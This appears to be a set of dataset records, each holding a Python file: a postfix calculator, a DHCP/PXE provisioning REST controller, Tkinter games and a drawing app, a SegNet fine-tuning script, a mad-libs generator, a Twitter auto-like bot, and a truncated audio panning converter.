self.__data = [None] * 10\r\n self.__length = 0\r\n return\r\n\r\n #Creates is_stack_empty\r\n def is_stack_empty(self):\r\n return self.__length == 0\r\n\r\n #Creates is_stack_full\r\n def is_stack_full(self):\r\n if self.__length == 10:\r\n return True\r\n else:\r\n return False\r\n\r\n #Creates push\r\n def push(self, item):\r\n if not self.is_stack_full():\r\n self.__data[self.__length] = item\r\n self.__length += 1\r\n else:\r\n raise ValueError(\"Stack is full!\") \r\n\r\n def pop(self):\r\n if not self.is_stack_empty():\r\n self.__length -= 1\r\n return_value = self.__data[self.__length]\r\n self.__data[self.__length] = None\r\n return return_value\r\n else:\r\n raise ValueError(\"Stack is empty!\")\r\n \r\n def top(self):\r\n for index in range(self.__length):\r\n if self.__data[index] == None:\r\n return self.__data[index - 1]\r\n return self.__data[self.__length - 1]\r\n\r\n def __len__(self):\r\n return len(self.__data)\r\n\r\n def __str__(self):\r\n return str(self.__data)\r\n \r\ndef main():\r\n expression_file = input(\"Enter the name of the file containing postfix expressions: \")\r\n\r\n found = False\r\n\r\n while not found:\r\n try:\r\n exp_list = open(expression_file)\r\n except FileNotFoundError as ex:\r\n print(expression_file, \"is not found.\")\r\n expression_file = input(\"Please enter another file name: \")\r\n else:\r\n found = True\r\n \r\n for expressions in range(10):\r\n expressions = exp_list.readline()\r\n print(expressions)\r\n \r\n calculator = Stack()\r\n\r\n for each in exp_list:\r\n try:\r\n value = int(each)\r\n except Exception as ex:\r\n second = calculator.pop()\r\n first = calculator.pop()\r\n\r\n if each == \"+\":\r\n answer = first + second\r\n calculator.push(answer)\r\n if each == '-':\r\n answer = first - second\r\n calculator.push(answer)\r\n elif each == \"*\":\r\n answer = first * second\r\n calculator.push(answer)\r\n elif each == \"/\":\r\n answer = first / second\r\n calculator.push(answer)\r\n else:\r\n calculator.push(value)\r\n print(\"Expression: \")\r\n print(\"Answer: \", calculator.pop())\r\n\r\n return\r\n\r\nmain()\r\n \r\n \r\n \r\n \r\n\r\n \r\n","sub_path":"PythonPrograms/PostfixNotation/postfixNotation.py","file_name":"postfixNotation.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"494329563","text":"from fabric.api import execute\nimport pecan\nfrom pecan import rest\nimport wsme\nfrom wsme import types as wtypes\nimport threading\nimport time\n\nfrom oslo_log import log\n\nfrom tuscloudos.api import expose\nfrom tuscloudos.api.controllers import base\nfrom tuscloudos.api.controllers import collection\nfrom tuscloudos import env_config as env_conf\nfrom tuscloudos import config as conf\nfrom tuscloudos import objects\nfrom tuscloudos import fab\nfrom tuscloudos.api.controllers.v1 import node\nfrom tuscloudos.api.controllers.v1 import types\nfrom tuscloudos.common import exception\nfrom tuscloudos.nova import api\nfrom tuscloudos import utils\nfrom tuscloudos import pacemaker as pcs\n\nCONF = conf.CONF\nLOG = log.getLogger(__name__)\n\nclass Dhcp(base.APIBase):\n\n host_uuid = wtypes.text\n hostname = wtypes.text\n ip = wtypes.text\n mac = wtypes.text\n\nclass DhcpController(rest.RestController):\n \"\"\"REST Dhcp for Default section\"\"\"\n\n def __init__(self):\n self.nova_api = api.API()\n super(DhcpController, self).__init__()\n\n def _sync_config(self, src, dest):\n hostname = utils.get_hostname()\n # copy files to other nodes\n execute(fab.copy,\n src,\n dest,\n hosts=env_conf.controller_nodes,\n exclude_hosts=[hostname]\n )\n\n def _sync_dhcp(self, name=None, create=False):\n hostname = utils.get_hostname()\n # copy files to other nodes\n if len(env_conf.controller_nodes) > 1:\n execute(fab.update_dhcp,\n name=name,\n create=create,\n hosts=env_conf.controller_nodes,\n exclude_hosts=[hostname]\n )\n\n\n def _create_dhcp(self, dhcp):\n nodes = self.nova_api.list_dhcp_physical_hosts()\n new_node = {'hostname': dhcp.hostname,\n 'manage_ip': dhcp.ip,\n 'manage_mac': dhcp.mac}\n nodes.append(new_node)\n with open('/etc/dhcp/dhcpd.conf', 'w+') as fout:\n fout.write(conf.env.get_template('tuscloudos/dhcpd.conf').render(\n my_ip=CONF.my_ip,\n dhcp_subnet=env_conf.get(key='dhcp_subnet'),\n dhcp_netmask=env_conf.get(key='dhcp_netmask'),\n dhcp_gateway=env_conf.get(key='dhcp_gateway'),\n hosts=nodes))\n\n utils.execute(\"sed -i 's/ next-server.*$/ next-server {};/g' /etc/dhcp/dhcpd.conf\"\n .format(CONF.my_ip))\n # generate config file\n mac_name = '01-' + dhcp.mac.replace(':', '-')\n utils.execute(\"mkdir -p /var/www/html/tuscloud/{}\".format(mac_name))\n with open('/var/www/html/tuscloud/{}/config'.format(mac_name), 'w+') as fout:\n fout.write(\"virtual_ip={}\\n\".format(CONF.virtual_ip))\n fout.write(\"host_uuid={}\".format(dhcp.host_uuid))\n\n with open('/var/www/html/tuscloud/{}/tuscloudos.conf'.format(mac_name), 'w+') as fout:\n fout.write(conf.env.get_template('tuscloudos/tuscloudos.conf').render(\n my_ip=dhcp.ip,\n my_fqdn=dhcp.hostname,\n virtual_ip=CONF.virtual_ip,\n controllers=CONF.controllers,\n rabbit_hosts=conf.get_rabbit_hosts()))\n\n with open('/var/www/html/tuscloud/{}/{}.cfg'.format(mac_name, mac_name), 'w+') as fout:\n fout.write(conf.env.get_template('pxe/tuscloud_mac.cfg').render(\n password=env_conf.get(key='ks_root_pw'),\n my_ip=CONF.virtual_ip,\n port=10080,\n mac=mac_name))\n\n with open('/tftpboot/pxelinux.cfg/{}'.format(mac_name), 'w+') as fout:\n fout.write(conf.env.get_template('pxe/default_mac').render(\n my_ip=CONF.virtual_ip,\n port=10080,\n mac=mac_name))\n utils.execute(\"chmod 777 /tftpboot/pxelinux.cfg/{}\".format(mac_name))\n\n def _delete_dhcp(self, hostname):\n nodes = self.nova_api.list_dhcp_physical_hosts()\n for node in nodes:\n if node['hostname'] == hostname:\n nodes.pop(node)\n with open('/etc/dhcp/dhcpd.conf', 'w+') as fout:\n fout.write(conf.env.get_template('tuscloudos/dhcpd.conf').render(\n my_ip=CONF.my_ip,\n dhcp_subnet=env_conf.get(key='dhcp_subnet'),\n dhcp_netmask=env_conf.get(key='dhcp_netmask'),\n dhcp_gateway=env_conf.get(key='dhcp_gateway'),\n hosts=nodes))\n\n def _restart_dhcp(self):\n utils.execute('pcs resource disable tus-dhcp')\n time.sleep(2)\n utils.execute('pcs resource enable tus-dhcp')\n\n @expose.expose(body=Dhcp, status_code=200)\n def post(self, dhcp):\n LOG.info(\"Create dhcp entry, hostname=%s, mac=%s, ip=%s\",\n dhcp.hostname,\n dhcp.mac,\n dhcp.ip)\n self._create_dhcp(dhcp)\n mac_name = '01-' + dhcp.mac.replace(':', '-')\n self._sync_dhcp(mac_name, True)\n self._restart_dhcp()\n\n @expose.expose(None, wtypes.text)\n def delete(self, hostname):\n LOG.info(\"Delete dhcp entry for hostname=%s\", hostname)\n self._delete_dhcp(hostname)\n self._sync_dhcp(create=False)\n self._restart_dhcp()\n\n @expose.expose(None, wtypes.text, body=wtypes.DictType(str, str))\n def put(self, hostname, patch):\n LOG.info(\"Update dhcp entry, hostname=%s, patch=%s\",\n hostname,\n patch)\n self._delete_dhcp(hostname)\n dhcp = Dhcp()\n dhcp.ip = patch['ip']\n dhcp.mac = patch['mac']\n dhcp.host_uuid = patch['host_uuid']\n dhcp.hostname = hostname\n mac_name = '01-' + dhcp.mac.replace(':', '-')\n self._create_dhcp(dhcp)\n self._sync_dhcp(mac_name, create=True)\n self._restart_dhcp()\n","sub_path":"others/src/cloud/api/controllers/v1/dhcp.py","file_name":"dhcp.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"72312893","text":"from tkinter import *\r\nimport tkinter.messagebox\r\n\r\n\r\ndef checked(i) :\r\n global player\r\n button = list[i]\r\n\r\n if button[\"text\"] != \" \" :\r\n return\r\n button[\"text\"] = player \r\n button[\"bg\"] = \"yellow\"\r\n\r\n \r\n if player == \"X\" :\r\n player = \"O\"\r\n button[\"bg\"] = \"yellow\"\r\n \r\n else :\r\n player = \"X\"\r\n button[\"bg\"] = \"lightgreen\"\r\n check()\r\n \r\n \r\nwindow = Tk()\r\nplayer = \"X\"\r\nlist = []\r\nwincase = [0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 3, 6, 1, 4, 7, 2, 5, 8, 0, 4, 8, 2, 4, 6] \r\n\r\nfor i in range(9) :\r\n b = Button(window, text=\" \", command=lambda k=i: checked(k))\r\n b.grid(row=i//3, column=i%3)\r\n list.append(b)\r\n \r\n\r\n\r\ndef check() :\r\n j=0\r\n while j < 22 :\r\n if list[wincase[j]][\"text\"] == list[wincase[j+1]][\"text\"] == list[wincase[j+2]][\"text\"] == \"X\" :\r\n tkinter.messagebox.showinfo(\"60132301이석준\", \"X is winner\")\r\n quit()\r\n elif list[wincase[j]][\"text\"] == list[wincase[j+1]][\"text\"] == list[wincase[j+2]][\"text\"] == \"O\":\r\n tkinter.messagebox.showinfo(\"60132301이석준\", \"O is winner\")\r\n quit()\r\n j = j+3;\r\n \r\n \r\nwindow.mainloop()\r\n\r\n\r\n","sub_path":"tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"429002650","text":"import tkinter\nfrom tkinter import *\n#import PIL\n#from PIL import Image, ImageTk, ImageDraw\n\nroot = Tk()\n\nwidth = 800\nheight = 500\nc_bg = 'white'\npensize = 5\nfg = 'black'\n\nroot.geometry(\"900x650\")\nroot.title('Draw')\n\n\nc = Canvas(root, width = width, height = height, bg = c_bg)\nc.place(x = 0, y = 0)\n\n\ndef paint(event):\n x1,y1=(event.x-1), (event.y-1)\n x2,y2=(event.x+1), (event.y+1)\n c.create_line(x1, y1, x2, y2, width = pensize, fill = fg,capstyle = ROUND, smooth = True)\n\ndef changepen1():\n\tglobal pensize\n\tpensize = 5\n\ndef changepen2():\n\tglobal pensize\n\tpensize = 10\n\n\ndef changepen3():\n\tglobal pensize\n\tpensize = 30\n\ndef changepen4():\n\tglobal pensize\n\tpensize = 50\n\ndef changepen5():\n\tglobal pensize\n\tpensize = 100\n\n\n\n\n\n\ndef redcolor():\n global fg\n fg = 'red'\n\ndef bluecolor():\n global fg\n fg = 'blue'\n\n\ndef greencolor():\n global fg\n fg = 'green'\n\ndef yellowcolor():\n global fg\n fg = 'yellow'\n\ndef whitecolor():\n global fg\n fg = 'white'\n\ndef pinkcolor():\n global fg\n fg = 'pink'\n\ndef lightbluecolor():\n global fg\n fg = 'lightblue'\n\ndef orangecolor():\n global fg\n fg = 'orange'\n\ndef blackcolor():\n global fg\n fg = 'black'\n\n\n\ndef clearc():\n \tc.delete(ALL)\n\n\ndef newboi():\n\tc.delete(ALL)\n\n\n\n\n\n\n\n\nc.bind('', paint)\n\npensizeb = Button(root, text = \" 1 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen1 )\npensizeb.place(x = 600, y = 500)\n\npensize1 = Button(root, text = \" 2 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen2 )\npensize1.place(x = 650, y = 500)\n\n\npensize2 = Button(root, text = \" 3 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen3 )\npensize2.place(x = 700, y = 500)\n\npensize3 = Button(root, text = \" 4 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen4 )\npensize3.place(x = 750, y = 500)\n\n\npensize4 = Button(root, text = \" 5 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen5 )\npensize4.place(x = 800, y = 500)\n\nredb = Button(root, text = \" \", bg = 'red',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = redcolor)\nredb.place(x = 10, y = 600)\n\nyellowb = Button(root, text = \" \", bg = 'yellow',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = yellowcolor)\nyellowb.place(x = 40, y = 600)\n\nlblueb = Button(root, text = \" \", bg = 'lightblue',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = lightbluecolor)\nlblueb.place(x = 70, y = 600)\n\npinkb = Button(root, text = \" \", bg = 'pink',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = pinkcolor)\npinkb.place(x = 70, y = 560)\n\nblueb = Button(root, text = \" \", bg = 'blue',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = bluecolor)\nblueb.place(x = 40, y = 560)\n\nwhiteb = Button(root, text = \" \", bg = 'white',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = whitecolor)\nwhiteb.place(x = 10, y = 560)\n\nblackb = Button(root, text = \" \", bg = 'black',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = blackcolor)\nblackb.place(x = 10, y = 520)\n\ngreenb = Button(root, text = \" \", bg = 'green',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = greencolor)\ngreenb.place(x = 40, y = 520)\n\norangeb = Button(root, text = \" \", bg = 'orange',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = orangecolor)\norangeb.place(x = 70, y = 520)\n\npb = Button(root, text = \" P \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = blackcolor )\npb.place(x = 650, y = 550)\n\neb = Button(root, text = \" E \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = whitecolor)\neb.place(x = 700, y = 550)\n\ncb = Button(root, text = \" C \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = clearc)\ncb.place(x = 750, y = 550)\n\nnewb = Button(root, text = \"New\", font = (\"Times\", 15, \"bold\"), command = newboi)\nnewb.place(x = 350, y = 550)\n\n\n\nroot.mainloop()\n","sub_path":"Draw/Draw.py","file_name":"Draw.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"466090766","text":"# coding=utf-8\n\nimport h5py\n# import win_unicode_console\n# win_unicode_console.enable()\nimport time\n\nimport matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport argparse\nimport numpy as np\nfrom keras.models import *\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D, BatchNormalization, Reshape, Permute, Activation, Dropout, \\\n Layer\nfrom keras.utils.np_utils import to_categorical\nfrom keras.preprocessing.image import img_to_array\nfrom keras.callbacks import ModelCheckpoint\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras import optimizers\nfrom keras import regularizers\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport cv2\nimport random\nimport os\nfrom tqdm import tqdm\nimport tensorflow as tf\nfrom keras.callbacks import TensorBoard\n\nfrom keras.applications.inception_v3 import InceptionV3,preprocess_input\nfrom keras.optimizers import Adagrad\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nseed = 7\nnp.random.seed(seed)\n\n# data_shape = 360*480\nimg_w = 256\nimg_h = 256\n# 有一个为背景\nn_label = 4 + 1\n\nclasses = [0., 1., 2., 3., 4.]\n\nlog_filepath_tl = '/home/zq/output/segnet_output_tl_ft/logs_tl'\nlog_filepath_ft = '/home/zq/output/segnet_output_tl_ft/logs_ft'\n\nEPOCHS = 30\nEPOCHS_tl = 2\nEPOCHS_ft = 10\nBS = 2\n\nlearning_rate = 0.01\nsgd = optimizers.SGD(lr = learning_rate, decay = learning_rate/EPOCHS, momentum=0.9, nesterov=True)\nadam = optimizers.Adam(lr=0.0001, beta_1=0.9, beta_2=0.999,epsilon=1e-08)\n\n\nlabelencoder = LabelEncoder()\nlabelencoder.fit(classes)\n\n\n# image_sets = ['1.png','2.png','3.png']\n\n\ndef load_img(path, grayscale=False):\n if grayscale:\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n else:\n img = cv2.imread(path)\n img = np.array(img, dtype=\"float\") / 255.0\n return img\n\n\nfilepath = \"/home/zq/dataset/dataset_RSI_eCognition/train/\"\n\n\ndef get_train_val(val_rate=0.25):\n train_url = []\n train_set = []\n val_set = []\n for pic in os.listdir(filepath + 'src'):\n train_url.append(pic)\n random.shuffle(train_url)\n total_num = len(train_url)\n val_num = int(val_rate * total_num)\n for i in range(len(train_url)):\n if i < val_num:\n val_set.append(train_url[i])\n else:\n train_set.append(train_url[i])\n return train_set, val_set\n\n\n# data for training\ndef generateData(batch_size, data=[]):\n # print 'generateData...'\n while True:\n train_data = []\n train_label = []\n batch = 0\n for i in (range(len(data))):\n url = data[i]\n batch += 1\n img = load_img(filepath + 'src//' + url)\n img = img_to_array(img)\n train_data.append(img)\n label = load_img(filepath + 'label//' + url, grayscale=True)\n label = img_to_array(label).reshape((img_w * img_h,))\n # print label.shape\n train_label.append(label)\n if batch % batch_size == 0:\n # print 'get enough bacth!\\n'\n train_data = np.array(train_data)\n train_label = np.array(train_label).flatten()\n train_label = labelencoder.transform(train_label)\n train_label = to_categorical(train_label, num_classes=n_label)\n train_label = train_label.reshape((batch_size, img_w * img_h, n_label))\n yield (train_data, train_label)\n train_data = []\n train_label = []\n batch = 0\n\n # data for validation\n\n\ndef generateValidData(batch_size, data=[]):\n # print 'generateValidData...'\n while True:\n valid_data = []\n valid_label = []\n batch = 0\n for i in (range(len(data))):\n url = data[i]\n batch += 1\n img = load_img(filepath + 'src//' + url)\n img = img_to_array(img)\n valid_data.append(img)\n label = load_img(filepath + 'label//' + url, grayscale=True)\n label = img_to_array(label).reshape((img_w * img_h,))\n # print label.shape\n valid_label.append(label)\n if batch % batch_size == 0:\n valid_data = np.array(valid_data)\n valid_label = np.array(valid_label).flatten()\n valid_label = labelencoder.transform(valid_label)\n valid_label = to_categorical(valid_label, num_classes=n_label)\n valid_label = valid_label.reshape((batch_size, img_w * img_h, n_label))\n yield (valid_data, valid_label)\n valid_data = []\n valid_label = []\n batch = 0\n\n\ndef setup_to_transfer_learning(model,base_model):\n for layer in base_model.layers:\n layer.trainable = False\n tf.trainable_variables()\n model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics= ['mae', 'acc'])\n\ndef setup_to_fine_tune(model,base_model):\n GAP_LAYER = 30\n for layer in base_model.layers[:GAP_LAYER+1]:\n layer.trainable = False\n for layer in base_model.layers[GAP_LAYER+1:]:\n layer.trainable = True\n model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics= ['mae', 'acc'])\n\n\ndef train():\n base_model = load_model('/home/zq/output/segnet_output/3rd_segnet_epoch_30_bs_2_new_image_100000/3rd_segnet_epoch_30_bs_2_new_image_100000.h5')\n model = base_model\n '''\n setup_to_transfer_learning(model, base_model)\n model.summary()\n train_set, val_set = get_train_val()\n train_numb = len(train_set)\n valid_numb = len(val_set)\n print(\"the number of train data is\", train_numb)\n print(\"the number of val data is\", valid_numb)\n\n H_tl = model.fit_generator(generator=generateData(BS, train_set), steps_per_epoch=train_numb // BS, epochs=EPOCHS_tl,\n verbose=1,\n validation_data=generateValidData(BS, val_set), validation_steps=valid_numb // BS,\n callbacks=[TensorBoard(log_dir=log_filepath_tl, histogram_freq=0, write_graph=True,\n write_grads=True, write_images=True)], max_q_size=1)\n\n # save as JSON\n json_string = model.to_json()\n open('/home/zq/output/segnet_output_tl_ft/my_model_architecture_tl.json', 'w').write(json_string)\n model = model_from_json(open('/home/zq/output/segnet_output_tl_ft/my_model_architecture_tl.json').read())\n\n model.save_weights('/home/zq/output/segnet_output_tl_ft/my_model_weights_tl.h5')\n\n model.save('/home/zq/output/segnet_output_tl_ft/segnet_tl.h5')\n\n # plot the training loss and accuracy\n plt.style.use(\"ggplot\")\n plt.figure()\n N = EPOCHS_tl\n plt.plot(np.arange(0, N), H_tl.history[\"loss\"], label=\"train_loss\")\n plt.plot(np.arange(0, N), H_tl.history[\"val_loss\"], label=\"val_loss\")\n plt.plot(np.arange(0, N), H_tl.history[\"acc\"], label=\"train_acc\")\n plt.plot(np.arange(0, N), H_tl.history[\"val_acc\"], label=\"val_acc\")\n plt.title(\"Training Loss and Accuracy on SegNet Satellite Seg\")\n plt.xlabel(\"Epoch_tl #\")\n plt.ylabel(\"Loss/Accuracy\")\n plt.legend(loc=\"lower left\")\n plt.savefig(\"/home/zq/output/segnet_output_tl_ft/segnet_loss_acc_tl.png\")\n '''\n\n setup_to_fine_tune(model, base_model)\n model.summary()\n train_set, val_set = get_train_val()\n train_numb = len(train_set)\n valid_numb = len(val_set)\n print(\"the number of train data is\", train_numb)\n print(\"the number of val data is\", valid_numb)\n\n H_ft = model.fit_generator(generator=generateData(BS, train_set), steps_per_epoch=train_numb // BS, epochs=EPOCHS_ft,\n verbose=1,\n validation_data=generateValidData(BS, val_set), validation_steps=valid_numb // BS,\n callbacks=[TensorBoard(log_dir=log_filepath_ft, histogram_freq=0, write_graph=True,\n write_grads=True, write_images=True)], max_q_size=1)\n\n # save as JSON\n json_string = model.to_json()\n open('/home/zq/output/segnet_output_tl_ft/my_model_architecture_ft.json', 'w').write(json_string)\n model = model_from_json(open('/home/zq/output/segnet_output_tl_ft/my_model_architecture_ft.json').read())\n\n model.save_weights('/home/zq/output/segnet_output_tl_ft/my_model_weights_ft.h5')\n\n model.save('/home/zq/output/segnet_output_tl_ft/segnet_ft.h5')\n\n # plot the training loss and accuracy\n plt.style.use(\"ggplot\")\n plt.figure()\n N = EPOCHS_ft\n plt.plot(np.arange(0, N), H_ft.history[\"loss\"], label=\"train_loss\")\n plt.plot(np.arange(0, N), H_ft.history[\"val_loss\"], label=\"val_loss\")\n plt.plot(np.arange(0, N), H_ft.history[\"acc\"], label=\"train_acc\")\n plt.plot(np.arange(0, N), H_ft.history[\"val_acc\"], label=\"val_acc\")\n plt.title(\"Training Loss and Accuracy on SegNet Satellite Seg\")\n plt.xlabel(\"Epoch_ft #\")\n plt.ylabel(\"Loss/Accuracy\")\n plt.legend(loc=\"lower left\")\n plt.savefig(\"/home/zq/output/segnet_output_tl_ft/segnet_loss_acc_ft.png\")\n\n\nif __name__ == '__main__':\n train()\n","sub_path":"segnet_train_tl_ft_real.py","file_name":"segnet_train_tl_ft_real.py","file_ext":"py","file_size_in_byte":9061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"97648103","text":"#madlibs generator\n\npara = \"\"\" Once upon a time, there was PROPER NAME, a beautiful young ANIMAL. \nIt loved to play HOBBY. \nOne day, a (an) EVENT arose, bribing PROPER NAME to come check it out. \nThe OBJECT sounded very ADVECTIVE and ADJECTIVE. Surprised,\nit was a treasure chest full of A DIFFERENT OBJECT. EMOTION, \nit picked it up and carried it back to the TRANSPORTATION. \nThen he climbed into the TRANSPORTATION NAME and drove PLACE. \nAnytime he opened the chest, he would put inside it a OBJECT for \nevery A DIFFERENT OBJECT he used up, glowing with EMOTION.\n\"\"\"\n\nprint(\"enter the following\")\nproper_name = input(\"proper name\\n\")\nhobby = input(\"enter hobby\\n\")\nevent = input(\"Event\\n\")\nobject = input(\"Object\\n\")\nadjective = input(\"adjective\\n\")\nadjective2 = input(\"adejctive\\n\")\na_different_object = input(\"A different object\\n\")\nemotion = input(\"Emotion\\n\");\ntransportation = input(\"Transportation\\n\")\ntransportation_name = input(\"Transprotatino's name\\n\");\nplace = input(\"Place\\n\")\nobject2 = input(\"Object\\n\")\nemotion = input(\"emotion\\n\")\nanimal = input(\"Animal\\n\")\n\npara = para.replace(\"PROPER NAME\",proper_name)\npara = para.replace(\"HOBBY\",hobby)\npara = para.replace(\"EVENT\",event)\npara = para.replace(\"OBJECT\",object)\npara = para.replace(\"ADJECTIVE\",adjective)\npara = para.replace(\"ADJECTIVE\",adjective2)\npara = para.replace(\"A DIFFERENCT OBJECT\",a_different_object)\npara = para.replace(\"EMOTION\",emotion)\npara = para.replace(\"TRANSPORTATIN\",transportation)\npara = para.replace(\"TRANSPORTATINO'S NAME\",transportation_name)\npara = para.replace(\"PLACE\",place)\npara = para.replace(\"OBJECT\",object2)\npara = para.replace(\"EMOTION\",emotion)\npara = para.replace(\"ANIMAL\",animal)\nprint(para) \n\n","sub_path":"mad libs generator.py","file_name":"mad libs generator.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"508891635","text":"from dcgan import *\nfrom nonsaturating import *\nimport torch\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nmnist = torchvision.datasets.MNIST('./MNIST',transform=transforms.Compose([transforms.Scale(32),transforms.ToTensor(),transforms.Normalize((.5,.5,.5),(.5,.5,.5))]),download=True)\ngenerator = Generator(64)\ndiscriminator = Discriminator(64)\ndevice = torch.device('cuda:0')\ngenerator.to(device)\ndiscriminator.to(device)\nprint(len(mnist))\nloader = torch.utils.data.DataLoader(mnist,batch_size=32,num_workers=4)\noptimG = optim.Adam(generator.parameters(),lr=0.0002)\noptimD = optim.SGD(discriminator.parameters(),lr=0.01)\ngan = NonsaturatingGAN(device,loader,generator,discriminator,optimG,optimD,batch_size=32,sample_size=32,epochs=100,label_smooth=0.7,p_flip=0.05,checkpoints='./nonsaturating-gan.model',recon='./images/')\ngan.set_targets(1)\ngan.load_model()\ngan.train()\n","sub_path":"CIFAR10/Nonsaturating-Heuristic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"281096998","text":"# not hard\n\ndef letterCombinations(digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n if not digits:\n return []\n m = [[\"0\"], [\"1\"], [\"a\",\"b\",\"c\"], [\"d\",\"e\",\"f\"], [\"g\",\"h\",\"i\"], [\"j\",\"k\",\"l\"], [\"m\",\"n\",\"o\"], [\"p\",\"q\",\"r\",\"s\"],\n [\"t\",\"u\",\"v\"], [\"w\",\"x\",\"y\",\"z\"]]\n result = m[int(digits[0])]\n\n for d in range(1, len(digits)):\n new = []\n for i in m[int(digits[d])]:\n for x in result:\n new.append(x + i)\n result = new\n return result\n\nprint(letterCombinations(\"\"))\n","sub_path":"1-100/mid/17. Letter Combinations of a Phone Number.py","file_name":"17. Letter Combinations of a Phone Number.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"57374126","text":"import socket\n\nUDP_IP = \"192.168.0.38\"\nUDP_PORT = 9001\nMESSAGE = \"Hello, World!\"\n\n\nsock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_DGRAM) # UDP\nsock.sendto(bytes(MESSAGE, 'ascii'), (UDP_IP, UDP_PORT))","sub_path":"udp_client.py","file_name":"udp_client.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328147806","text":"import MyTwitter, sys\n\n# テキストチェック\ndef check_text(text):\n words = ['アニメーター', 'イラスト', '絵描き', 'pixiv']\n return True in [word in text for word in words]\n\n# URLチェック\ndef check_url(entities, word):\n try:\n if word in entities['url']['urls'][0]['display_url']: return True\n except:\n pass\n return True in [word in url['display_url'] for url in entities['description']['urls']]\n\ndef execute(list_name):\n twitter, user_id = MyTwitter.login()\n list_id = MyTwitter.get_list_id(list_name)\n tweets = []\n timeline = MyTwitter.get_list_timeline(twitter, list_id, 1000)\n for tweet in timeline:\n if tweet.get('retweeted_status'): tweet = tweet['retweeted_status']\n user = tweet['user']\n if tweet['entities'].get('media') \\\n and MyTwitter.is_timeover(tweet['created_at'], 7) == False \\\n and tweet['favorite_count'] > 1000 \\\n and MyTwitter.is_liked(twitter, tweet['id_str']) == False \\\n and user['followers_count'] > 2 * user['friends_count'] \\\n and user['followers_count'] > 1000 \\\n and tweet['favorite_count'] > 2 * tweet['retweet_count'] \\\n and (check_text(user['description']) \\\n or check_url(user['entities'], 'pixiv')):\n tweets.append(tweet)\n if tweets == []: return\n tweet = max(tweets, key = lambda tweet: tweet['favorite_count'])\n MyTwitter.like(twitter, tweet['id_str'])\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n execute(sys.argv[1])\n else:\n print(\"Usage: python3 {0} [LIST_NAME]\".format(sys.argv[0]))\n sys.exit()\n","sub_path":"LikeKawaii.py","file_name":"LikeKawaii.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"610164804","text":"from argparse import ArgumentParser\n\nimport numpy as np\nfrom mutagen.easyid3 import EasyID3\nfrom mutagen.mp3 import MP3\nfrom pydub import AudioSegment\nfrom tqdm import tqdm\n\nreverberance = 50\nSECONDS = 3500\nMIN_FADE_VOL = -15.0\nFADE_TIME = 1000\n\n\ndef convert(inputfile, outputfile, period):\n if period < 0:\n period = period * (-1)\n elif period == 0:\n period = 200\n audio = AudioSegment.from_file(inputfile, format='mp3')\n audio = audio + AudioSegment.silent(duration=SECONDS)\n left = audio.pan(-1)\n right = audio.pan(1)\n faded_left = AudioSegment.silent(duration=0)\n faded_right = AudioSegment.silent(duration=0)\n fileinfo = MP3(inputfile, ID3=EasyID3)\n\n i = 0\n\n while len(faded_left) < len(audio):\n faded_left += left[i:i + SECONDS - FADE_TIME].fade(from_gain=MIN_FADE_VOL, start=0,\n duration=SECONDS - FADE_TIME)\n faded_left += left[i + SECONDS - FADE_TIME:i + SECONDS]\n i += SECONDS\n faded_left += left[i:i + SECONDS - FADE_TIME].fade(to_gain=MIN_FADE_VOL, start=0, duration=SECONDS - FADE_TIME)\n faded_left += left[i + SECONDS - FADE_TIME:i + SECONDS] + MIN_FADE_VOL\n i += SECONDS\n\n i = 0\n\n while len(faded_right) < len(audio):\n faded_right += right[i:i + SECONDS - 